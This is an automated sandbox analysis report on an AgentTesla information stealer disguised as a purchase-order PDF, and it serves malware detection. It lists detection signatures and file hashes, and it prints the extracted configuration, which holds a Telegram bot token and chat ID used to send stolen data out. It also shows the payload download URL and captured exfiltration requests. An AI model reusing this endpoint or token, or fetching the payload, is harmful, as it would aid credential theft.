Windows Analysis Report
RFQ__PO_PO 24090041-PDF____PDF.exe

Overview

General Information

Sample name: RFQ__PO_PO 24090041-PDF____PDF.exe
Analysis ID: 1525395
MD5: bfea25f0cbf64304aaa2c361805d5e51
SHA1: 700796263c71c76607cbbd74678b0b084d7bdb7c
SHA256: 0870d9107c380e8a94587e7924b1230d146ea21c6bbc7b9731bff408204ab8d0
Tags: exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Avira: detection malicious, Label: HEUR/AGEN.1310836
Found malware configuration
Source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}
Source: RFQ__PO_PO 24090041-PDF____PDF.exe.6204.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}
Multi AV Scanner detection for domain / URL
Source: wymascensores.com Virustotal: Detection: 11% Perma Link
Source: https://wymascensores.com/rigasin/Chody.mp3 Virustotal: Detection: 9% Perma Link
Source: https://wymascensores.com/rigasin/Chody.mp31PDOh7YFOr1sSh4 Virustotal: Detection: 9% Perma Link
Source: https://wymascensores.com Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Virustotal: Detection: 25% Perma Link
Multi AV Scanner detection for submitted file
Source: RFQ__PO_PO 24090041-PDF____PDF.exe ReversingLabs: Detection: 34%
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Virustotal: Detection: 25% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.00000000031C7000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.00000000031C7000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_05EE05E8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_05EE05DD
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 0_2_05EE1161
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 0_2_061F07D8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 0_2_061F07D0
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then jmp 06213A76h 0_2_062136E0
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then jmp 06213A76h 0_2_062136D6
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then jmp 0621C010h 0_2_0621BF50
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then jmp 0621C010h 0_2_0621BF58
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then jmp 0621441Fh 0_2_06214210
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 4x nop then jmp 0621441Fh 0_2_06214240
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 2_2_064305DD
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 2_2_064305E8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 2_2_06431161
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 2_2_067407D0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 2_2_067407D8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 06763A76h 2_2_067636E0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 06763A76h 2_2_067636DF
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 0676C010h 2_2_0676BF50
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 0676C010h 2_2_0676BF58
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 0676441Fh 2_2_06764240
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_05EB05E8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_05EB05DD
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 7_2_05EB1161
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_061C07D8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_061C07D0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 061E3A76h 7_2_061E36D6
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 061E3A76h 7_2_061E36E0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 061EC010h 7_2_061EBF58
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 061EC010h 7_2_061EBF50
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 061E441Fh 7_2_061E4210
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 4x nop then jmp 061E441Fh 7_2_061E4240

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49731 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49731 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49734 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49734 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49734
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49741 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49741 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49741
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9347ac6cHost: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9b442453Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9fdbe5e2Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 67.212.175.162 67.212.175.162
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: wymascensores.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9347ac6cHost: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
Source: InstallUtil.exe, 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1890943123.00000000025D6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002596000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002806000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: InstallUtil.exe, 00000001.00000002.1890943123.00000000025D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002596000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002806000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/
Source: InstallUtil.exe, 00000001.00000002.1890943123.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002592000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002802000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wymascensores.com
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wymascensores.com/rigasin/Chody.mp3
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, Afoagcjtqvi.exe.0.dr String found in binary or memory: https://wymascensores.com/rigasin/Chody.mp31PDOh7YFOr1sSh4
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: RFQ__PO_PO 24090041-PDF____PDF.exe
Source: initial sample Static PE information: Filename: RFQ__PO_PO 24090041-PDF____PDF.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621D420 NtProtectVirtualMemory, 0_2_0621D420
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621EDA8 NtResumeThread, 0_2_0621EDA8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621D41F NtProtectVirtualMemory, 0_2_0621D41F
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621EDA0 NtResumeThread, 0_2_0621EDA0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676D420 NtProtectVirtualMemory, 2_2_0676D420
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676EDA8 NtResumeThread, 2_2_0676EDA8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676D418 NtProtectVirtualMemory, 2_2_0676D418
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676EDA0 NtResumeThread, 2_2_0676EDA0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061ED420 NtProtectVirtualMemory, 7_2_061ED420
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061EEDA8 NtResumeThread, 7_2_061EEDA8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061ED41E NtProtectVirtualMemory, 7_2_061ED41E
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061EEDA0 NtResumeThread, 7_2_061EEDA0
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_01182728 0_2_01182728
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0118207D 0_2_0118207D
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_01182098 0_2_01182098
